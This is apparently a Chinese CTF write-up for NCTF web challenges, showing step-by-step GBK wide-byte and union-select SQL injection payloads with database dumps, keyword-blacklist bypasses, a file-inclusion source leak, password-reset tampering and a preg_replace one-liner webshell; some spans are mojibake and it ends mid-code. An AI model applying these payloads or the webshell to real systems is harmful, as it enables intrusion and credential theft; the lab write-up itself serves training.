我们来看一下path是怎么构成的，修改一下path和filename看看：

1. filename=download.jpg
2. uppath=/uploads/dowload.phpdownload.jpg
3. upfilename=path & filename

利用0X00截断(关于截断上传可以参看这篇文章，将download.php后面的download.jpg截断:
uppath=/uploads/download.phpchr(0)download.jpg
nctf{welcome_to_hacks_world}

起名字真难

地址：代码如下

<?php
 function noother_says_correct($number)
{
        $one = ord('1');
        $nine = ord('9');
        for ($i = 0; $i < strlen($number); $i++)
        {   
                $digit = ord($number{$i});
                if ( ($digit >= $one) && ($digit <= $nine) )
                {
                        return false;
                }
        }
           return $number == '54975581388';
}
$flag='*******';
if(noother_says_correct($_GET['key']))
    echo $flag;
else 
    echo 'access denied';
?>

分析：
1.要使noother_says_correct($_GET['key'])为真
2.则 $number == '54975581388'成立，返回True
3.而前面代码又检测$number不能是1-9的数字
利用==特性
54975581388十六进制是ccccccccc
http://chinalover.sinaapp.com/web12/index.php?key=0xccccccccc
The flag is:nctf{follow_your_dream}
nctf{follow_your_dream}

sql injection 3

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1

宽字节注入

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1'

your sql:select id,title from news where id = '1\''
Hello World!OVO

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df'

your sql:select id,title from news where id = '1運''

Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in SQL-GBK/index.php on line 10

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df' and 1=1 -- -

your sql:select id,title from news where id = '1運' and 1=1 -- -'
Hello World!OVO

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df' and 1=2 -- -

your sql:select id,title from news where id = '1運' and 1=2 -- -'

很好，可以注入

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df' order by 2 -- -

your sql:select id,title from news where id = '1運' order by 2 -- -'
Hello World!OVO

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df' and 1=2 union select 1,2 -- -

your sql:select id,title from news where id = '1運' and 1=2 union select 1,2 -- -'
2

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df' and 1=2 union select 1,concat_ws(0x7c,user(),database(),version()) -- -

your sql:select id,title from news where id = '1運' and 1=2 union select 1,concat_ws(0x7c,user(),database(),version()) -- -'
sae-chinalover@220.181.129.119|sae-chinalover|5.5.52-0ubuntu0.14.04.1

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df' and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sae-chinalover'-- -

your sql:select id,title from news where id = '1運' and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=\'sae-chinalover\'-- -'

Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in SQL-GBK/index.php on line 10

单引号‘’被转义了

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df' and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=0x7361652d6368696e616c6f766572-- -

sae-chinalover十六进制是0x7361652d6368696e616c6f766572，用十六进制来绕过字符转义

your sql:select id,title from news where id = '1運' and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=0x7361652d6368696e616c6f766572-- -'
ctf,ctf2,ctf3,ctf4,news

在ctf2中找到flag

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df' and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x63746632 and table_schema=0x7361652d6368696e616c6f766572-- -

your sql:select id,title from news where id = '1運' and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x63746632 and table_schema=0x7361652d6368696e616c6f766572-- -'
id,content

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df' and 1=2 union select 1,group_concat(id,content) from ctf2-- -

your sql:select id,title from news where id = '1運' and 1=2 union select 1,group_concat(id,content) from ctf2-- -'
1020no msg in 1020,1021no msg in 1021 too,1022no msg in 1022,1023no msg in 1023~~~,1024the flag is:nctf{query_in_mysql},1025no more

nctf{query_in_mysql}
这题好像炸了，看了别人的writeup发现链接不同，考点依然是宽字节注入，nctf{gbk_3sqli}。

密码重置

重置管理员账号：admin 的密码

你在点击忘记密码之后你的邮箱收到了这么一封重置密码的邮件：

点击此链接重置您的密码

http://nctf.nuptzj.cn/web13/index.php?user1=Y3RmdXNlcg==
Y3RmdXNlcg==是base64加密的ctfuser
修改user=admin,和url的user1=base64(admin)即可
nctf{reset_password_often_have_vuln}

sql injection 4

继续注入吧~
题目地址

TIP:反斜杠可以用来转义
仔细查看相关函数的用法

查看源码

<!--
#GOAL: login as admin,then get the flag;
error_reporting(0);
require 'db.inc.php';

function clean($str){
    if(get_magic_quotes_gpc()){
        $str=stripslashes($str);
    }
    return htmlentities($str, ENT_QUOTES);
}

$username = @clean((string)$_GET['username']);
$password = @clean((string)$_GET['password']);

$query='SELECT * FROM users WHERE name=\''.$username.'\' AND pass=\''.$password.'\';';
$result=mysql_query($query);
if(!$result || mysql_num_rows($result) < 1){
    die('Invalid password!');
}

echo $flag;
-->
Invalid password!

sql语句
SELECT * FROM users WHERE name=\''.$username.'\' AND pass=\''.$password.'\';
等价于：
SELECT * FROM users WHERE name=' $username' AND pass='$password';
SQL语句单引号类型
1.添加一个单引号来闭合第一个单引号，因为前面有stripslashes转义了，所以这个方法不行。
http://chinalover.sinaapp.com/web15/index.php?username=admin' or 1=1 1-- - &password=123
2.通过\转义将第二个引号省略掉：
http://chinalover.sinaapp.com/web15/index.php?username=admin&password= or 1=1 -- -
sql语句变成：
SELECT * FROM users WHERE name=' admin\' AND pass= ' or 1=1 -- -';
刷新flag出现：flag:nctf{sql_injection_is_interesting}
nctf{sql_injection_is_interesting}

你从哪里来

你是从 google 来的吗？
传送门：题目地址

按道理修改referer === "https://www.google.com/就可以，但是好像网站炸了，看了源码确实是这样做。

<?php
$referer = $_SERVER['referer'];
if ($referer === "https://www.google.com/ " || $referer === "https://www.google.com"){
    echo "nctf{http_referer}";
}else{
    echo "are you from google?";
}
?>

AAencode

javascript aaencode

传送门：题目地址

打开链接发现是这样的乱码，不知道怎么回事，不应该啊。
锞熛夛緹锞�= /锝€锝嵚达級锞� ~鈹烩攣鈹� //*麓鈭囷絸*/ ['_']; o=(锞燂桨锞�) =_=3; c=(锞熚橈緹) =(锞燂桨锞�)-(锞燂桨锞�); (锞熜旓緹) =(锞熚橈緹)= (o^_^o)/ (o^_^o);(锞熜旓緹)={锞熚橈緹: '_' ,锞熛夛緹锞� : ((蠅锞燂緣==3) +'_') [锞熚橈緹] ,锞燂桨锞燂緣 :(锞熛夛緹锞�+ '_')[o^_^o -(锞熚橈緹)] ,锞熜旓緹锞�:((锞燂桨锞�==3) +'_')[锞燂桨锞焆 }; (锞熜旓緹) [锞熚橈緹] =((锞熛夛緹锞�==3) +'_') [c^_^o];(锞熜旓緹) ['c'] = ((锞熜旓緹)+'_') [ (锞燂桨锞�)+(锞燂桨锞�)-(锞熚橈緹) ];(锞熜旓緹) ['o'] = ((锞熜旓緹)+'_') [锞熚橈緹];(锞無锞�)=(锞熜旓緹) ['c']+(锞熜旓緹) ['o']+(锞熛夛緹锞� +'_')[锞熚橈緹]+ ((锞熛夛緹锞�==3) +'_') [锞燂桨锞焆 + ((锞熜旓緹) +'_') [(锞燂桨锞�)+(锞燂桨锞�)]+ ((锞燂桨锞�==3) +'_') [锞熚橈緹]+((锞燂桨锞�==3) +'_') [(锞燂桨锞�) - (锞熚橈緹)]+(锞熜旓緹) ['c']+((锞熜旓緹)+'_') [(锞燂桨锞�)+(锞燂桨锞�)]+ (锞熜旓緹) ['o']+((锞燂桨锞�==3) +'_') [锞熚橈緹];(锞熜旓緹) ['_'] =(o^_^o) [锞無锞焆 [锞無锞焆;(锞熚碉緹)=((锞燂桨锞�==3) +'_') [锞熚橈緹]+ (锞熜旓緹) .锞熜旓緹锞�+((锞熜旓緹)+'_') [(锞燂桨锞�) + (锞燂桨锞�)]+((锞燂桨锞�==3) +'_') [o^_^o -锞熚橈緹]+((锞燂桨锞�==3) +'_') [锞熚橈緹]+ (锞熛夛緹锞� +'_') [锞熚橈緹]; (锞燂桨锞�)+=(锞熚橈緹); (锞熜旓緹)[锞熚碉緹]='\\'; (锞熜旓緹).锞熚橈緹锞�=(锞熜旓緹+ 锞燂桨锞�)[o^_^o -(锞熚橈緹)];(o锞燂桨锞無)=(锞熛夛緹锞� +'_')[c^_^o];(锞熜旓緹) [锞無锞焆='\"';(锞熜旓緹) ['_'] ( (锞熜旓緹) ['_'] (锞熚碉緹+(锞熜旓緹)[锞無锞焆+ (锞熜旓緹)[锞熚碉緹]+(锞熚橈緹)+ (锞燂桨锞�)+ (锞熚橈緹)+ (锞熜旓緹)[锞熚碉緹]+(锞熚橈緹)+ ((锞燂桨锞�) + (锞熚橈緹))+ (锞燂桨锞�)+ (锞熜旓緹)[锞熚碉緹]+(锞熚橈緹)+ (锞燂桨锞�)+ ((锞燂桨锞�) + (锞熚橈緹))+ (锞熜旓緹)[锞熚碉緹]+(锞熚橈緹)+ ((o^_^o) +(o^_^o))+ ((o^_^o) - (锞熚橈緹))+ (锞熜旓緹)[锞熚碉緹]+(锞熚橈緹)+ ((o^_^o) +(o^_^o))+ (锞燂桨锞�)+ (锞熜旓緹)[锞熚碉緹]+((锞燂桨锞�) + (锞熚橈緹))+ (c^_^o)+ (锞熜旓緹)[锞熚碉緹]+(锞燂桨锞�)+ ((o^_^o) - (锞熚橈緹))+ (锞熜旓緹)[锞熚碉緹]+(锞熚橈緹)+ ((锞燂桨锞�) + (锞熚橈緹))+ ((o^_^o) +(o^_^o))+ (锞熜旓緹)[锞熚碉緹]+(锞熚橈緹)+ (锞燂桨锞�)+ (o^_^o)+ (锞熜旓緹)[锞熚碉緹]+(锞熚橈緹)+ ((o^_^o) +(o^_^o))+ (锞燂桨锞�)+ (锞熜旓緹)[锞熚碉緹]+(锞熚橈緹)+ (锞燂桨锞�)+ ((o^_^o) +(o^_^o))+ (锞熜旓緹)[锞熚碉緹]+(锞熚橈緹)+ ((锞燂桨锞�) + (o^_^o))+ (o^_^o)+ (锞熜旓緹)[锞熚碉緹]+(锞熚橈緹)+ ((锞燂桨锞�) + (锞熚橈緹))+ ((o^_^o) - (锞熚橈緹))+ (锞熜旓緹)[锞熚碉緹]+(锞熚橈緹)+ (锞燂桨锞�)+ (锞熚橈緹)+ (锞熜旓緹)[锞熚碉緹]+(锞熚橈緹)+ ((o^_^o) +(o^_^o))+ ((o^_^o) +(o^_^o))+ (锞熜旓緹)[锞熚碉緹]+(锞熚橈緹)+ (锞燂桨锞�)+ (锞熚橈緹)+ (锞熜旓緹)[锞熚碉緹]+(锞熚橈緹)+ ((o^_^o) +(o^_^o))+ (o^_^o)+ (锞熜旓緹)[锞熚碉緹]+(锞熚橈緹)+ (锞燂桨锞�)+ (o^_^o)+ (锞熜旓緹)[锞熚碉緹]+(锞熚橈緹)+ ((o^_^o) +(o^_^o))+ ((o^_^o) - (锞熚橈緹))+ (锞熜旓緹)[锞熚碉緹]+(锞熚橈緹)+ ((锞燂桨锞�) + (锞熚橈緹))+ (锞熚橈緹)+ (锞熜旓緹)[锞熚碉緹]+(锞熚橈緹)+ ((o^_^o) +(o^_^o))+ (c^_^o)+ (锞熜旓緹)[锞熚碉緹]+(锞熚橈緹)+ ((o^_^o) +(o^_^o))+ (锞燂桨锞�)+ (锞熜旓緹)[锞熚碉緹]+(锞熚橈緹)+ (o^_^o)+ ((锞燂桨锞�) + (o^_^o))+ (锞熜旓緹)[锞熚碉緹]+(锞熚橈緹)+ (锞燂桨锞�)+ (锞熚橈緹)+ (锞熜旓緹)[锞熚碉緹]+(锞熚橈緹)+ (锞燂桨锞�)+ (锞熚橈緹)+ (锞熜旓緹)[锞熚碉緹]+(锞熚橈緹)+ (锞燂桨锞�)+ ((锞燂桨锞�) + (锞熚橈緹))+ (锞熜旓緹)[锞熚碉緹]+(锞熚橈緹)+ ((锞燂桨锞�) + (锞熚橈緹))+ ((o^_^o) +(o^_^o))+ (锞熜旓緹)[锞熚碉緹]+(锞熚橈緹)+ (锞燂桨锞�)+ (o^_^o)+ (锞熜旓緹)[锞熚碉緹]+(锞熚橈緹)+ ((锞燂桨锞�) + (锞熚橈緹))+ ((锞燂桨锞�) + (o^_^o))+ (锞熜旓緹)[锞熚碉緹]+(锞熚橈緹)+ (锞燂桨锞�)+ (锞燂桨锞�)+ (锞熜旓緹)[锞熚碉緹]+(锞熚橈緹)+ (锞燂桨锞�)+ ((锞燂桨锞�) + (锞熚橈緹))+ (锞熜旓緹)[锞熚碉緹]+(锞熚橈緹)+ ((锞燂桨锞�) + (o^_^o))+ ((锞燂桨锞�) + (锞熚橈緹))+ (锞熜旓緹)[锞熚碉緹]+(锞燂桨锞�)+ ((o^_^o) - (锞熚橈緹))+ (锞熜旓緹)[锞熚碉緹]+((锞燂桨锞�) + (锞熚橈緹))+ (锞熚橈緹)+ (锞熜旓緹)[锞無锞焆) (锞熚橈緹)) ('_');
看了源码,确实不应该这样，这样的AAencode直接在控制台运行就可以。
ﾟωﾟﾉ= /｀ｍ´）ﾉ ~┻━┻ //*´∇｀*/ ['_']; o=(ﾟｰﾟ) =_=3; c=(ﾟΘﾟ) =(ﾟｰﾟ)-(ﾟｰﾟ); (ﾟДﾟ) =(ﾟΘﾟ)= (o^_^o)/ (o^_^o);(ﾟДﾟ)={ﾟΘﾟ: '_' ,ﾟωﾟﾉ : ((ﾟωﾟﾉ==3) +'_') [ﾟΘﾟ] ,ﾟｰﾟﾉ :(ﾟωﾟﾉ+ '_')[o^_^o -(ﾟΘﾟ)] ,ﾟДﾟﾉ:((ﾟｰﾟ==3) +'_')[ﾟｰﾟ] }; (ﾟДﾟ) [ﾟΘﾟ] =((ﾟωﾟﾉ==3) +'_') [c^_^o];(ﾟДﾟ) ['c'] = ((ﾟДﾟ)+'_') [ (ﾟｰﾟ)+(ﾟｰﾟ)-(ﾟΘﾟ) ];(ﾟДﾟ) ['o'] = ((ﾟДﾟ)+'_') [ﾟΘﾟ];(ﾟoﾟ)=(ﾟДﾟ) ['c']+(ﾟДﾟ) ['o']+(ﾟωﾟﾉ +'_')[ﾟΘﾟ]+ ((ﾟωﾟﾉ==3) +'_') [ﾟｰﾟ] + ((ﾟДﾟ) +'_') [(ﾟｰﾟ)+(ﾟｰﾟ)]+ ((ﾟｰﾟ==3) +'_') [ﾟΘﾟ]+((ﾟｰﾟ==3) +'_') [(ﾟｰﾟ) - (ﾟΘﾟ)]+(ﾟДﾟ) ['c']+((ﾟДﾟ)+'_') [(ﾟｰﾟ)+(ﾟｰﾟ)]+ (ﾟДﾟ) ['o']+((ﾟｰﾟ==3) +'_') [ﾟΘﾟ];(ﾟДﾟ) ['_'] =(o^_^o) [ﾟoﾟ] [ﾟoﾟ];(ﾟεﾟ)=((ﾟｰﾟ==3) +'_') [ﾟΘﾟ]+ (ﾟДﾟ) .ﾟДﾟﾉ+((ﾟДﾟ)+'_') [(ﾟｰﾟ) + (ﾟｰﾟ)]+((ﾟｰﾟ==3) +'_') [o^_^o -ﾟΘﾟ]+((ﾟｰﾟ==3) +'_') [ﾟΘﾟ]+ (ﾟωﾟﾉ +'_') [ﾟΘﾟ]; (ﾟｰﾟ)+=(ﾟΘﾟ); (ﾟДﾟ)[ﾟεﾟ]='\\'; (ﾟДﾟ).ﾟΘﾟﾉ=(ﾟДﾟ+ ﾟｰﾟ)[o^_^o -(ﾟΘﾟ)];(oﾟｰﾟo)=(ﾟωﾟﾉ +'_')[c^_^o];(ﾟДﾟ) [ﾟoﾟ]='\"';(ﾟДﾟ) ['_'] ( (ﾟДﾟ) ['_'] (ﾟεﾟ+(ﾟДﾟ)[ﾟoﾟ]+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟｰﾟ)+ (ﾟΘﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟｰﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟｰﾟ)+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((o^_^o) +(o^_^o))+ ((o^_^o) - (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((o^_^o) +(o^_^o))+ (ﾟｰﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+((ﾟｰﾟ) + (ﾟΘﾟ))+ (c^_^o)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟｰﾟ)+ ((o^_^o) - (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ ((o^_^o) +(o^_^o))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟｰﾟ)+ (o^_^o)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((o^_^o) +(o^_^o))+ (ﾟｰﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟｰﾟ)+ ((o^_^o) +(o^_^o))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((ﾟｰﾟ) + (o^_^o))+ (o^_^o)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ ((o^_^o) - (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟｰﾟ)+ (ﾟΘﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((o^_^o) +(o^_^o))+ ((o^_^o) +(o^_^o))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟｰﾟ)+ (ﾟΘﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((o^_^o) +(o^_^o))+ (o^_^o)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟｰﾟ)+ (o^_^o)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((o^_^o) +(o^_^o))+ ((o^_^o) - (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟΘﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((o^_^o) +(o^_^o))+ (c^_^o)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((o^_^o) +(o^_^o))+ (ﾟｰﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (o^_^o)+ ((ﾟｰﾟ) + (o^_^o))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟｰﾟ)+ (ﾟΘﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟｰﾟ)+ (ﾟΘﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟｰﾟ)+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ ((o^_^o) +(o^_^o))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟｰﾟ)+ (o^_^o)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ ((ﾟｰﾟ) + (o^_^o))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟｰﾟ)+ (ﾟｰﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟｰﾟ)+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((ﾟｰﾟ) + (o^_^o))+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟｰﾟ)+ ((o^_^o) - (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟΘﾟ)+ (ﾟДﾟ)[ﾟoﾟ]) (ﾟΘﾟ)) ('_');
nctf{javascript_aaencode}

php 反序列化

http://115.28.150.176/php1/index.php
代码：

<?php
class just4fun {
    var $enter;
    var $secret;
}

if (isset($_GET['pass'])) {
    $pass = $_GET['pass'];

    if(get_magic_quotes_gpc()){
        $pass=stripslashes($pass);
    }

    $o = unserialize($pass);

    if ($o) {
        $o->secret = "*";
        if ($o->secret === $o->enter)
            echo "Congratulation! Here is my secret: ".$o->secret;
        else 
            echo "Oh no... You can't fool me";
    }
    else echo "are you trolling?";
}
?>

这题不会哈哈哈，太菜了。

SQL注入2

注入第二题~~主要考察union查询
传送门:点我带你飞

Source:

<html>
<head>
Secure Web Login II
</head>
<body>

<?php
if($_POST[user] && $_POST[pass]) {
   mysql_connect(SAE_MYSQL_HOST_M . ':' . SAE_MYSQL_PORT,SAE_MYSQL_USER,SAE_MYSQL_PASS);
  mysql_select_db(SAE_MYSQL_DB);
  $user = $_POST[user];
  $pass = md5($_POST[pass]);
  $query = @mysql_fetch_array(mysql_query("select pw from ctf where user='$user'"));
  if (($query[pw]) && (!strcasecmp($pass, $query[pw]))) {
      echo "<p>Logged in! Key: ntcf{**************} </p>";
  }
  else {
    echo("<p>Log in failure!</p>");
  }
}
?>


<form method=post action=index.php>
<input type=text name=user value="Username">
<input type=password name=pass value="Password">
<input type=submit>
</form>
</body>
<a href="index.phps">Source</a>
</html>

关键语句：

1.  $pass = md5($_POST[pass]);
2.  $query = @mysql_fetch_array(mysql_query("select pw from ctf where user='$user'"));
3.  strcasecmp():如果两者相等，返回 0。

我们可以自己select一个password返回给 $query:
select pw from ctf where user='$user' and 0=1 union select md5(123) -- -

1. and 0=1使前面的select pw from ctf where user='$user'为假，返回空。
2. 整个语句就返回md5(123)给$query
3. 这样就绕开了查询数据库，直接我们赋值给$query

ntcf{union_select_is_wtf}

综合题2

非xss题但是欢迎留言~
地址：get the flag

点击最下面的本CMS说明：
http://cms.nuptzj.cn/about.php?file=sm.txt
显示：
很明显，这是安装后留下来忘删除的文件。。。至于链接会出现在主页上，这就要问管理员了。。。 ===============================华丽的分割线============================= 本CMS由Funny公司开发的公司留言板系统，据本技术总监说，此CMS采用国际顶级的技术所开发，安全性和实用性杠杠滴~</br> 以下是本CMS各文件的功能说明（由于程序猿偷懒，只列了部分文件） config.php：存放数据库信息，移植此CMS时要修改 index.php：主页文件 passencode.php：Funny公司自写密码加密算法库 say.php：用于接收和处理用户留言请求 sm.txt：本CMS的说明文档 sae的information_schema表好像没法检索，我在这里给出admin表结构 create table admin ( id integer, username text, userpass text, ) ======================================================================== 下面是正经的：本渗透测试平台由：三只小潴(root#zcnhonker.net)& 冷爱(hh250@qq.com)开发.由你们周老大我辛苦修改，不能题目都被AK嘛，你们说是不是。所以这一题。。你们做出来也算你们吊咯。
看url显然是一个文件包含，那么用来看看about.php的源码吧：

1. 可以用php://filter
2. 这个file参数就是用来查看源码的，可以直接file=about.php查看

about.php源码：

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> 
<?php 
$file=$_GET['file']; 
if($file=="" || strstr($file,'config.php')){
 echo "file参数不能为空！"; 
exit(); 
}
else{ 
$cut=strchr($file,"loginxlcteam");
 if($cut==false){ 
$data=file_get_contents($file); 
$date=htmlspecialchars($data); 
echo $date; 
}
else{ 
echo "<script>alert('敏感目录，禁止查看！但是。。。')
</script>"; } 
}

file=loginxlcteam可能是登陆页面
函数解析：

1. strstr() 函数搜索字符串在另一字符串中的第一次出现。如果未找到所搜索的字符串，则返回 FALSE。
2. strchr() 函数是 strstr() 函数的别名。
3. (a): file=config.php或者空，就返回"file参数不能为空！"
   (b): file=loginxlcteam，返回"敏感目录，禁止查看！但是。。。"

结论就是about.php就是一个用来都网页源码的网址。
思路：

1.搜索栏可以SQL注入,拿管理员账号密码
2.getshell

1. SQL注入

查看 http://cms.nuptzj.cn/about.php/?file=so.php

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> 
<html xmlns="http://www.w3.org/1999/xhtml"> 
<head> 
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> 
<title>搜索留言</title> 
</head> 
<body> 
<center> 
<div id="say" name="say" align="left" style="width:1024px"> 
<?php 
if($_SERVER['HTTP_USER_AGENT']!="Xlcteam Browser"){ 
echo '万恶滴黑阔，本功能只有用本公司开发的浏览器才可以用喔~'; 
exit(); 
} 
$id=$_POST['soid']; 
include 'config.php'; 
include 'antiinject.php'; 
include 'antixss.php'; 
$id=antiinject($id); 
$con = mysql_connect($db_address,$db_user,$db_pass) or die("不能连接到数据库！！".mysql_error()); 
mysql_select_db($db_name,$con); 
$id=mysql_real_escape_string($id); 
$result=mysql_query("SELECT * FROM `message` WHERE display=1 AND id=$id");
$rs=mysql_fetch_array($result); 
echo htmlspecialchars($rs['nice']).':<br />&nbsp;&nbsp;&nbsp;&nbsp;'.antixss($rs['say']).'<br />';
mysql_free_result($result); 
mysql_free_result($file); 
mysql_close($con); 
?> 
</div> 
</center> 
</body> 
</html>

Modefy headers修改user agent=Xlcteam Browser
查看 http://cms.nuptzj.cn/about.php/?file=antiinject.php

<?php 
function antiinject($content){ 
$keyword=array("select","union","and","from",' ',"'",";",'"',"char","or","count","master","name","pass","admin","+","-","order","="); 
$info=strtolower($content); 
for($i=0;$i<=count($keyword);$i++){ 
$info=str_replace($keyword[$i], '',$info); 
} 
return $info; } 
?>

绕过blacklist，这里和[AceBear CTF 2018] Web-urlparameter里的$_SERVER["REQUEST_URI"]类型不同：
1.这里是post方法，Urlparameter是get方法。
2.这里不能像urlparameter一样直接改url。
采用Insert Double Write绕过，注释符/* */代替空格
注入过程：

1. soid=2/**/oorroorrderder/**/by/**/4
2. soid=1/**/aandnd/**/1>2/**/uunionnion/**/sselectelect/**/1,2,3,4
或：soid=0/**/uunionnion/**/sselectelect/**/1,2,3,4
3. soid=1/**/aandnd/**/1>2/**/uunionnion/**/sselectelect/**/1,concat_ws(0x7c,id,usernnameame,userppassass),3,4/**/ffromrom/**/aadmindmin

得到：1|admin|102 117 99 107 114 117 110 116 117

密码102 117 99 107 114 117 110 116 117ASCII转码为fuckruntu
通过御剑扫到后台登陆页面，发现不对，其实是之前about.php源码有给出login页面：file=loginxlcteam
http://cms.nuptzj.cn/loginxlcteam

2. 开始登陆, Getshell

继续利用about.php查看xlcteam.php源码：http://cms.nuptzj.cn/about.php?file=xlcteam.php
<?php $e = $_REQUEST['www']; $arr = array($_POST['wtf'] => '|.*|e',); array_walk($arr, $e, ''); ?>
连接菜刀，此类一句话木马连接方式参考文章，password=wtf
http://cms.nuptzj.cn/xlcteam.php?www=preg_replace
nctf{you_are_s0_g00d_hacker}

密码重置2

题题被秒，当时我就不乐意了！
本题来源于CUMT
题目链接

TIPS:
1.管理员邮箱观察一下就可以找到
2.linux下一般使用vi编辑器，并且异常退出会留下备份文件
3.弱类型bypass

查看源码找到邮箱:admin@nuptzj.cn

<pre id="line1"><!DOCTYPE html>  
<html>  <head>  
<meta charset="utf-8" />  
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />  
<meta name="renderer" content="webkit" />  
<meta name="admin" content="admin@nuptzj.cn" />  
<meta name="editor" content="Vim" />  
<title>logic</title>  
<style type="text/css"> body,html{
            position: relative;
            height: 100%;
            width: 100%;
            padding: 0;
            margin: 0;
            background-color: #272822;
            color: #fff;
        }
        form{
            position: absolute;
            top: 50%;
            left: 50%;
            width: 400px;
            margin: -70px -200px;
        }
        form input{
            display: block;
            margin: 10px auto;
            width: 100%;
            border: none;
            height: 2rem;
            border-radius: 5px;
        } </style>  </head>  <body>  
<form action="[submit.php](view-source:http://nctf.nuptzj.cn/web14/submit.php)" method="GET">  
<h1>找回管理员密码</h1> email:<input name="emailAddress" type="text" />
</br> token:<input name="token" type="text" />
</br>  <input type="submit" value="提交">  
</form>  </body>  </html>  </pre>

尝试找到.swp文件：

1.http://nctf.nuptzj.cn/web14/.index.php.swp----Not Found
2.http://nctf.nuptzj.cn/web14/.submit.php.swp---Success


........杩欎竴琛屾槸鐪佺暐鐨勪唬鐮�........

/*
濡傛灉鐧诲綍閭鍦板潃涓嶆槸绠＄悊鍛樺垯 die()
鏁版嵁搴撶粨鏋�

--
-- 琛ㄧ殑缁撴瀯 `user`
--

CREATE TABLE IF NOT EXISTS `user` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `username` varchar(255) NOT NULL,
  `email` varchar(255) NOT NULL,
  `token` int(255) NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`)
) ENGINE=MyISAM  DEFAULT CHARSET=utf8 AUTO_INCREMENT=2 ;

--
-- 杞瓨琛ㄤ腑鐨勬暟鎹� `user`
--

INSERT INTO `user` (`id`, `username`, `email`, `token`) VALUES
(1, '****涓嶅彲瑙�***', '***涓嶅彲瑙�***', 0);
*/


........杩欎竴琛屾槸鐪佺暐鐨勪唬鐮�........

if(!empty($token)&&!empty($emailAddress)){
    if(strlen($token)!=10) die('fail');
    if($token!='0') die('fail');
    $sql = "SELECT count(*) as num from `user` where token='$token' AND email='$emailAddress'";
    $r = mysql_query($sql) or die('db error');
